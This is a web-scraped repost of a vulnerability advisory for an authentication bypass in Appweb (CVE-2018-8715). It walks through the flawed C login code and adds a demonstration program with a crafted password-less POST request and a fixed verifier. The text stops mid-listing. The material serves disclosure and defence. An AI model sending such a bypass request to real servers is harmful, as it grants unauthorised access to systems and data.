{"id":11742,"date":"2018-03-14T14:20:51","date_gmt":"2018-03-14T22:20:51","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/03\/14\/news-5512\/"},"modified":"2018-03-14T14:20:51","modified_gmt":"2018-03-14T22:20:51","slug":"news-5512","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/03\/14\/news-5512\/","title":{"rendered":"SSD Advisory &#8211; AppWeb Authentication Bypass (Digest, Basic and Forms)"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus | Date: Wed, 14 Mar 2018 19:01:53 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\" id=\"a-href-3676\">ssd@beyondsecurity.com<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> A critical vulnerability exists in the EmbedThis HTTP library and in Appweb versions 5.5.x, 6.x and 7.x, including the latest version present in the git repository.<\/p>\n<p>In detail, due to a logic flaw, a forged HTTP request makes it possible to bypass authentication for the form and digest login types.<\/p>\n<p><strong>Confirmed Vulnerable<\/strong><br \/> Appweb version 7.0.2 and prior<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Davide Quarta (@_ocean), and Truel IT have reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> Vendor response was exceptionally quick: within 2 days of reporting the vulnerability to them 
they had a patch available, a new version (Appweb 7.0.3) and information available to the public: https:\/\/github.com\/embedthis\/appweb\/issues\/610<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-8715<br \/> <span id=\"more-3676\"><\/span><br \/> <strong>Vulnerability Details<\/strong><br \/> Due to a logic flaw in the authentication procedure, an attacker who knows the target username can completely bypass both form and digest authentication by means of a crafted HTTP POST request.<\/p>\n<p><em>File http\/httpLib.c \u2013 function authCondition()<\/em><br \/> This function calls the two functions responsible for authentication: httpGetCredentials and httpLogin. Notice that the return value of httpGetCredentials is never checked; this will be useful later.<\/p>\n<div id=\"crayon-5aa9a042c3978832337550\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">14559 static int authCondition(HttpConn *conn, HttpRoute *route, HttpRouteOp *op)\n14560 {\n14561 HttpAuth *auth;\n14562 cchar *username, *password;\n14563\n14564 assert(conn);\n14565 assert(route);\n14566\n14567 auth = route-&gt;auth;\n14568 if (!auth || !auth-&gt;type) {\n14569 \/* Authentication not required *\/\n14570 return HTTP_ROUTE_OK;\n14571 }\n14572 if (!httpIsAuthenticated(conn)) {\n14573 httpGetCredentials(conn, &amp;username, &amp;password);\n14574 if (!httpLogin(conn, username, password)) {\n14575 if (!conn-&gt;tx-&gt;finalized) {\n14576 if (auth &amp;&amp; auth-&gt;type) {\n14577 (auth-&gt;type-&gt;askLogin)(conn);\n14578 } else {\n14579 httpError(conn, HTTP_CODE_UNAUTHORIZED, \"Access Denied, login required\");\n14580 }\n14581 \/* Request has been denied and a response generated. So OK to accept this route. *\/\n14582 }\n14583 return HTTP_ROUTE_OK;\n14584 }\n14585 }\n14586 if (!httpCanUser(conn, NULL)) {\n14587 httpTrace(conn, \"auth.check\", \"error\", \"msg:'Access denied, user is not authorized for access'\");\n14588 if (!conn-&gt;tx-&gt;finalized) {\n14589 httpError(conn, HTTP_CODE_FORBIDDEN, \"Access denied. 
User is not authorized for access.\");\n14590 \/* Request has been denied and a response generated. So OK to accept this route. *\/\n14591 }\n14592 }\n14593 \/* OK to accept route. This does not mean the request was authenticated - an error may have been already generated *\/\n14594 return HTTP_ROUTE_OK;\n14595 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<p><em>File http\/httpLib.c \u2013 function httpGetCredentials()<\/em><br \/> This function receives two pointers that it fills with the username and password parsed from the request. Since authCondition never checks its return value, it does not matter if the \u201cparseAuth\u201d callback fails: the request can carry any fields we want in the Authorization header or in the POST data used for authentication.<\/p>\n<div id=\"crayon-5aa9a042c3981930855479\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">1640 \/*\n1641 Get the username and password credentials. If using an in-protocol auth scheme like basic|digest, the\n1642 rx-&gt;authDetails will contain the credentials and the parseAuth callback will be invoked to parse.\n1643 Otherwise, it is expected that \"username\" and \"password\" fields are present in the request parameters.\n
1644\n1645 This is called by authCondition which thereafter calls httpLogin\n1646 *\/\n1647 PUBLIC bool httpGetCredentials(HttpConn *conn, cchar **username, cchar **password)\n1648 {\n1649 HttpAuth *auth;\n1650\n1651 assert(username);\n1652 assert(password);\n1653 *username = *password = NULL;\n1654\n1655 auth = conn-&gt;rx-&gt;route-&gt;auth;\n1656 if (!auth || !auth-&gt;type) {\n1657 return 0;\n1658 }\n1659 if (auth-&gt;type) {\n1660 if (conn-&gt;authType &amp;&amp; !smatch(conn-&gt;authType, auth-&gt;type-&gt;name)) {\n1661 if (!(smatch(auth-&gt;type-&gt;name, \"form\") &amp;&amp; conn-&gt;rx-&gt;flags &amp; HTTP_POST)) {\n1662 \/* If a posted form authentication, ignore any basic|digest details in request *\/\n1663 return 0;\n1664 }\n1665 }\n1666 if (auth-&gt;type-&gt;parseAuth &amp;&amp; (auth-&gt;type-&gt;parseAuth)(conn, username, password) &lt; 0) {\n1667 return 0;\n1668 }\n1669 } else {\n1670 *username = httpGetParam(conn, \"username\", 0);\n1671 *password = httpGetParam(conn, \"password\", 0);\n1672 }\n1673 return 1;\n1674 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<p>  
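The following is an added example written for this page; it is not part of the advisory and not code from EmbedThis or from the researcher. It models in plain C the control flow discussed on this page: credential extraction hands back NULL for a form field that was never sent, the login step validates only the username and passes the password pointer through untouched, and the verifier treats a NULL password as the auto-login case and succeeds. Beside it is a hardened verifier in which a missing password is always a failed login. The user store, the parameter parser, the \/login path, the function names and the sample request are all assumptions of the example, and the hardened variant is the example's own suggestion rather than the vendor's 7.0.3 patch.

```c
/*
 * Added example for this advisory, not EmbedThis/Appweb code and not the
 * researcher's proof of concept: a plain-C model of the CVE-2018-8715 control
 * flow. All names, the user store, the /login path and the request below are
 * this example's own assumptions.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed user store with one account. Appweb compares an MD5 of
   "user:realm:password"; a plain string keeps the model short. */
typedef struct { const char *username; const char *password; } User;
static const User USERS[] = { { "admin", "s3cret" } };

static const User *lookup_user(const char *username) {
    for (size_t i = 0; i < sizeof USERS / sizeof USERS[0]; i++)
        if (strcmp(USERS[i].username, username) == 0) return &USERS[i];
    return NULL;
}

/* Stand-in for httpGetParam(): malloc'd value of key in a "k=v&k=v" body,
   or NULL when the field was not sent at all. */
static char *get_param(const char *body, const char *key) {
    size_t klen = strlen(key);
    const char *p = body;
    while (p && *p) {
        const char *amp = strchr(p, '&');
        size_t seglen = amp ? (size_t)(amp - p) : strlen(p);
        if (seglen > klen && strncmp(p, key, klen) == 0 && p[klen] == '=') {
            size_t vlen = seglen - klen - 1;
            char *v = malloc(vlen + 1);
            if (!v) return NULL;
            memcpy(v, p + klen + 1, vlen);
            v[vlen] = '\0';
            return v;
        }
        p = amp ? amp + 1 : NULL;
    }
    return NULL;
}

/* Body of a raw HTTP request: everything after the blank line. */
static const char *body_of(const char *raw) {
    const char *sep = strstr(raw, "\r\n\r\n");
    return sep ? sep + 4 : "";
}

/* Model of configVerifyUser() in Appweb 7.0.2: NULL was meant to mean auto-login,
   but no caller guarantees that. */
static int verify_user_vulnerable(const char *username, const char *password) {
    const User *u = lookup_user(username);
    if (!u) return 0;                                         /* unknown user */
    if (password) return strcmp(password, u->password) == 0; /* line 2031 */
    return 1;                                                 /* line 2055 */
}

/* Hardened verifier (this example's suggestion, not the vendor's 7.0.3 fix):
   no password, no login. A real auto-login route would resolve its configured
   user before ever calling a verifier with client input. */
static int verify_user_fixed(const char *username, const char *password) {
    const User *u = lookup_user(username);
    return u && password && strcmp(password, u->password) == 0;
}

/* Model of httpLogin() fed by the form path of httpGetCredentials(): the
   username is validated, the password pointer is passed through untouched. */
static int login_vulnerable(const char *body) {
    char *username = get_param(body, "username");
    char *password = get_param(body, "password");   /* NULL if the field is missing */
    int ok = username && *username && verify_user_vulnerable(username, password);
    free(username); free(password);
    return ok;
}

/* Same flow, but a missing password is rejected before any verifier runs. */
static int login_fixed(const char *body) {
    char *username = get_param(body, "username");
    char *password = get_param(body, "password");
    int ok = username && *username && password && verify_user_fixed(username, password);
    free(username); free(password);
    return ok;
}

/* Constructed request of the kind the advisory describes: a form login POST
   naming a known user and simply omitting the password field. */
static const char CRAFTED_REQUEST[] =
    "POST /login HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 14\r\n\r\n"
    "username=admin";

int main(void) {
    const char *body = body_of(CRAFTED_REQUEST);
    printf("7.0.2 logic, no password field:    %s\n", login_vulnerable(body) ? "LOGGED IN" : "denied");
    printf("hardened logic, no password field: %s\n", login_fixed(body) ? "LOGGED IN" : "denied");
    printf("hardened logic, correct password:  %s\n", login_fixed("username=admin&password=s3cret") ? "LOGGED IN" : "denied");
    return 0;
}
```

Build with any C99 compiler (cc -std=c99) and run: the 7.0.2-style login accepts the password-less POST for admin, while the hardened login denies it and still accepts the correct password. The point to take from the model is that the only legitimate NULL-password path (auto-login) must be decided by server configuration before the verifier runs, never inferred from what the client chose to omit.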
<\/p>\n<p><em>File http\/httpLib.c \u2013 function httpLogin()<\/em><br \/> This function checks that the username is non-NULL and non-empty; the password pointer is never checked and can be NULL (httpLogin itself sets it to NULL only for the auto-login case), so a NULL password reaches the verifyUser callback unchanged.<\/p>\n<div id=\"crayon-5aa9a042c3985105449381\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" 
readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">1686 PUBLIC bool httpLogin(HttpConn *conn, cchar *username, cchar *password)\n1687 {\n1688     HttpRx *rx;\n1689     HttpAuth *auth;\n1690     HttpSession *session;\n1691     HttpVerifyUser verifyUser;\n1692 \n1693     rx = conn-&gt;rx;\n1694     auth = rx-&gt;route-&gt;auth;\n1695     if (!username || !*username) {\n1696         httpTrace(conn, \"auth.login.error\", \"error\", \"msg:'missing username'\");\n1697         return 0;\n1698     }\n1699     if (!auth-&gt;store) {\n1700         mprLog(\"error http auth\", 0, \"No AuthStore defined\");\n1701         return 0;\n1702     }\n1703     if ((verifyUser = auth-&gt;verifyUser) == 0) {\n1704         if (!auth-&gt;parent || (verifyUser = auth-&gt;parent-&gt;verifyUser) == 0) {\n1705             verifyUser = auth-&gt;store-&gt;verifyUser;\n1706         }\n1707     }\n1708     if (!verifyUser) {\n1709         mprLog(\"error http auth\", 0, \"No user verification routine defined on route %s\", rx-&gt;route-&gt;pattern);\n1710         return 0;\n1711     }\n1712     if (auth-&gt;username &amp;&amp; *auth-&gt;username) {\n1713         \/* If using auto-login, replace the username *\/\n1714         username = auth-&gt;username;\n1715         password = 0;\n1716     }\n1717     if (!(verifyUser)(conn, username, password)) {\n1718         return 0;\n1719     }\n1720     if (!(auth-&gt;flags &amp; HTTP_AUTH_NO_SESSION) &amp;&amp; !auth-&gt;store-&gt;noSession) {\n1721         if ((session = httpCreateSession(conn)) == 0) {\n1722             \/* Too many sessions *\/\n1723             return 0;\n1724         }\n1725         httpSetSessionVar(conn, HTTP_SESSION_USERNAME, username);\n1726         httpSetSessionVar(conn, HTTP_SESSION_IP, conn-&gt;ip);\n1727     }\n1728     rx-&gt;authenticated = 1;\n1729     rx-&gt;authenticateProbed = 1;\n1730     conn-&gt;username = sclone(username);\n1731     conn-&gt;encoded = 0;\n1732     return 1;\n1733 }\n\nFile http\/httpLib.c \u2013 function configVerifyUser()\nThe following function first checks for the presence of a valid user, either one already set in the session or one passed in the request. Since we are able to pass a null password (line 2031), we can bypass the actual password checks and authenticate successfully by reaching line 2055.\n\n2014 \/*\n2015     Verify the user password for the \"config\" store based on the users defined via configuration directives.\n2016     Password may be NULL only if using auto-login.\n2017  *\/\n2018 static bool configVerifyUser(HttpConn *conn, cchar *username, cchar *password)\n2019 {\n2020     HttpRx *rx;\n2021     HttpAuth *auth;\n2022     bool success;\n2023     char *requiredPassword;\n2024 \n2025     rx = conn-&gt;rx;\n2026     auth = rx-&gt;route-&gt;auth;\n2027     if (!conn-&gt;user &amp;&amp; (conn-&gt;user = mprLookupKey(auth-&gt;userCache, username)) == 0) {\n2028         httpTrace(conn, \"auth.login.error\", \"error\", \"msg: 'Unknown user', username:'%s'\", username);\n2029         return 0;\n2030     }\n2031     if (password) {\n2032         if (auth-&gt;realm == 0 || *auth-&gt;realm == '\\0') {\n2033             mprLog(\"error http auth\", 0, \"No AuthRealm defined\");\n2034         }\n2035         requiredPassword = (rx-&gt;passwordDigest) ? rx-&gt;passwordDigest : conn-&gt;user-&gt;password;\n2036         if (sncmp(requiredPassword, \"BF\", 2) == 0 &amp;&amp; slen(requiredPassword) &gt; 4 &amp;&amp; isdigit(requiredPassword[2]) &amp;&amp;\n2037                 requiredPassword[3] == ':') {\n2038             \/* Blowfish *\/\n2039             success = mprCheckPassword(sfmt(\"%s:%s:%s\", username, auth-&gt;realm, password), conn-&gt;user-&gt;password);\n2040 \n2041         } else {\n2042             if (!conn-&gt;encoded) {\n2043                 password = mprGetMD5(sfmt(\"%s:%s:%s\", username, auth-&gt;realm, password));\n2044                 conn-&gt;encoded = 1;\n2045             }\n2046             success = smatch(password, requiredPassword);\n2047         }\n2048         if (success) {\n2049             httpTrace(conn, \"auth.login.authenticated\", \"context\", \"msg:'User authenticated', username:'%s'\", username);\n2050         } else {\n2051             httpTrace(conn, \"auth.login.error\", \"error\", \"msg:'Password failed to authenticate', username:'%s'\", username);\n2052         }\n2053         return success;\n2054     }\n2055     return 1;\n2056 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-1\"><span class=\"crayon-cn\">1686<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">PUBLIC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpLogin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HttpConn *<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-2\"><span class=\"crayon-cn\">1687<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-3\"><span class=\"crayon-cn\">1688<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpRx *<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-4\"><span class=\"crayon-cn\">1689<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpAuth *<\/span><span
class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-5\"><span class=\"crayon-cn\">1690<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpSession *<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-6\"><span class=\"crayon-cn\">1691<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpVerifyUser <\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-7\"><span class=\"crayon-cn\">1692<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-8\"><span class=\"crayon-cn\">1693<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-9\"><span class=\"crayon-cn\">1694<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">route<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-10\"><span class=\"crayon-cn\">1695<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-o\">!<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-11\"><span class=\"crayon-cn\">1696<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"auth.login.error\"<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"error\"<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"msg:'missing username'\"<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-12\"><span class=\"crayon-cn\">1697<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-13\"><span class=\"crayon-cn\">1698<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-14\"><span class=\"crayon-cn\">1699<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span
class=\"crayon-v\">store<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-15\"><span class=\"crayon-cn\">1700<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprLog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">\"error http auth\"<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"No AuthStore defined\"<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-16\"><span class=\"crayon-cn\">1701<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-17\"><span class=\"crayon-cn\">1702<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-18\"><span class=\"crayon-cn\">1703<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span
class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-19\"><span class=\"crayon-cn\">1704<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-r\">parent<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-r\">parent<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-20\"><span class=\"crayon-cn\">1705<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">store<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-21\"><span class=\"crayon-cn\">1706<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-22\"><span class=\"crayon-cn\">1707<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-23\"><span class=\"crayon-cn\">1708<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-24\"><span class=\"crayon-cn\">1709<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprLog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">\"error http auth\"<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"No user verification routine defined on route %s\"<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">route<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">pattern<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-25\"><span class=\"crayon-cn\">1710<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-26\"><span class=\"crayon-cn\">1711<\/span><span class=\"crayon-h\"> <\/span><span
class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-27\"><span class=\"crayon-cn\">1712<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-28\"><span class=\"crayon-cn\">1713<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* If using auto-login, replace the username *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-29\"><span class=\"crayon-cn\">1714<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-30\"><span class=\"crayon-cn\">1715<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> 